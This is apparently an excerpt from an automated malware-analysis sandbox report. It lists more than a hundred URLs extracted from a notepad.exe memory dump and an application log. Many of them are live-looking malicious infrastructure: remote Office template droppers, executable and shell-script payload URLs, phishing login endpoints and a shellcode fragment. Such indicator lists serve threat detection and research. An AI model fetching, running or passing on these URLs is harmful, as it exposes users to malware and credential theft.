Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://83.166.246.59/ua-lt98brkc2/perform/luck/
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://93.115.26.76:8000/index.html
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://a0708743.xsph.ru/regain/regions.pdf/f
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://acetica.online/presently/refuge/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://aktualizieren-wolke.de/99.dotm
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://arcorretoradeseguros.eating-organic.net
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://atozlovebook.com/vision.iosapp-o%appdata%
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://belkus.bounceme.net/preparation/bars/relation/heading/toppbw.dot
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/clamp.dot
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cakemixturereview.xyz/wp-includes/u2ayyvcprhwqeryw4/
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://cdn.$
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://comunicaagorane.myvnc.com/cnre/out/gravadados.php
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://datasecure.icu/kb4209t/09xp
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://decoderswlezrsa7.onion
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://diagnostic.htb:
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://docria.github.io
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://domainandserversecurityupdatedcomplete.duckdns.org/msoffice/document_012000.doc
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://earium.ru/ua-lt5cg63120d6/country/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://egyptianredcrescent-alex.com/ucount=www.standardbankonline.encrypted/php/
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://false.grafitto.ru/dch00-01/rehearsal.dot
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://filecopying.xyz/update/kbp08x
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://files.telefacer.com/1/18.html
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://files.telefacer.com/1/2.html
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://fusari.ru/904ce54ddc27/glitter/glitter1/salvage.dot
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://gca.co.za/wp-content/plugins/
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://github.com
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://goo.gl/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://google.com
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://htmlpreview.github.io
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://http://b0ffffff?ffffff???333333?333333?.drid
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://i.firstinstallmac.club/static/mplayer/mplayer.zip
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://ipv4.fiddler:
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://isearch.omiga-plus.com/?type=sc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://jmcglone.com
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://karab.hopto.org/kilo.dot
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://kitten-268.frge.io/article.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopot.myftp.biz/menu/kilos/oyjkff.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lump.semara.ru/dch00-01/counter/nearest/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lump.semara.ru/dch00-01/counter/nearest/needle.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://majesticraft.com/ema/panel/purchaseorder.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://media.vitkvitk.com/xmlstatic/ads/videoplaza/vittalia.html?df=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://melitaeas.online/985bdc0f/princess/go/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://metasploit.comvarshellcode1=unescape
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mishkat-arom.com/boutique/skin/frontend/rwd/default/js/lib/elevatezoom/2021/files/reportmaers
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nay78.glow.nakushita.ru/pr_kyy/endless.abr
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://officewindowssecurityfirewallopen.duckdns.org/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://outfish.bounceme.net/outl.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://pilasto.host/po.exe
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ppaauuaa11232.cc/dlx5rc.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pretence77.glorious.nonima.ru/elenapc/principles/nearly.mp3
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://private0091111.duckdns.org/qagj/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://private0091111.duckdns.org/qagj/gipsy.png
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://ramashardware.co.za/wp-fxm.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rgtconsultoriaimobiliaria.eating-organic.net
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://securecon.top/kb8xp/1806xp
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://securecon.top/kb8xp/248p
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shgshgwsdynationalobjindustrialat18ygs.duckdns.org/receipt/invoice_202121.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://simpant.sc.ug/ccc/expl.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://snapper.genesysindonesia.com/excel/excelz/index.php?email=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://sound23.sundabokun.ru/frimepc2016-pc/allowance.stc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srsp.app/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stdykungcommunicationtarisupliermg51gma.duckdns.org/receipt/invoice_651252.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://swipermachinereview.xyz/wp-includes/t3ow4kf0p0q8oo/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://theenterpriseholdings.com/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thrprivatecloudshareandfileprotectagent.duckdns.org/receipt/invoice_651254.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://tomond.ru/vz/release/refreshment/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tomond.ru/vz/release/refreshment/regular.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://towardsdatascience.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://transfer.sh/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://usa-national.info/gpu/self/relic.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://usb.mine.nu/c.sh-o/users/shared/c.sh
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vesicafirearms.com/default_page_static_resources/are3qx2hrev8cstwss/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://vsit.site/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://windowsdefendergateway.duckdns.org/documents.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://word2022.c1.biz/template.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www-searches.com/?s=f1tzdefytd1
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.22find.com/?utm_source=b&utm_medium=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.5z8.info/cockfights_e9g5fw_aryanbr0ther00d
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bonusesfound.ml/update/index.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comeinbaby.com/updateerror/fiif
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.delta-homes.com/?utm_source=b&utm_medium=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
          Source: notepad.exe, 00000000.00000002.606666431.000001CF7AA7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.mygreatlearning.com
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.poltc.cz/zackova/novak.exe-outfilec:
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.sakurasora.com/zsp_pdf.php%22%20method%3d%22post
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.shorturl.co.in/b8k74irtb
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.sweet-page.com/?type=sc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.systweak.com/registrycleaner
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.theabigailbloomcakecompany.co.uk/wp-content/uploads/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/t3chyy
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yourcontents.xyz/0758/0806pn
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yuanbinglun.com/www.yuanbinglun.com/7kkwqmxrwqk0oli/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://a.pomf.cat/litjjy.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://a.pomf.cat/lphott.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ab.v-mail.online/?e=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acaciavictorias.com/sxmal.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://accounts.google.com/o/oauth2/auth
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ads-letter.info/api/install/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://alejandraprestamosv7.ceramicdentalimplants.net.au/sleg.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alttitude-finance.com/wp-content/plugins/js_composer/vendor/mmihey/5qwkwhxc.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesky.com/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://arcomsanitizacion.cl/asp/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arcomsanitizacion.cl/asp/label.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://armybar.hopto.org/remoteload.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://awareaudience.com/bay/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bb.realestateprivateportfolio.com/img/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://bextlife.xyz/wizthaiguy/excell.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/alexserg112/newtrix/downloads/dfgdfg.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/atlasover/atlassiancore/downloads/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/meganzscr/repname/downloads/frr.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/report-fedex.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://bluecornerblog.tk/puzo/doc/purchase.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://bnet.forrentinproutsneckthechip.com/z/script/veri/login.php?email=w.masiga
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brandtrust.com.pk/fonts/login/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://browserimprovements.com/check-opt-out?url=$
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://business.missedvoicevolp.com/?e=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cartoonist.me.uk/wp-content/plugins/jetpack/scss/_utilities/us1svv7bfhaue.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/818650717425369109/820114768295231529/lll.x86
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ceibosnorte.com/images/clients/01/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ceibosnorte.com/images/clients/01/lub.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chargethe.cloud/audio/index.php#safa&#46;navas
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://childrenplacebd.com/functions/h
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chinatafseer.com/linners/vipe_11/send.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clever-links.com/kwihl
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clever-links.com/rgeaa
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://connectoutlook.email/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://connectoutlook.email/main.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://creators.care/zxhwcmvzc3jlcxvlc3razxhwzmyuy29t
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digitalsurana.com/wp-content/kch/new-po.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://dn.se/bot_tjansteskrivelse.docx
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://docria.github.io
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://dohabritishschool.tk/pdf/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dohabritishschool.tk/pdf/ahmad.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doocument.m2diving.ml/fay/login.php?log
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://e-secure-log.ga/abu/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://e-secure-log.ga/abu/next.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://emicrosoftteam.com/scot/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://emicrosoftteam.com/scot/nxt.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://emulatoros.github.io
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://endodermic-needles.000webhostapp.com/clean.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://exaltmathiasministries.org/wp-content/plugins/litespeed-cache/src/cdn/zdac74pa.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://extraosseous.com/zik/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://extraosseous.com/zik/document.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.attend-doha-expo.com/inv.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://formbucket.com/f/buk_
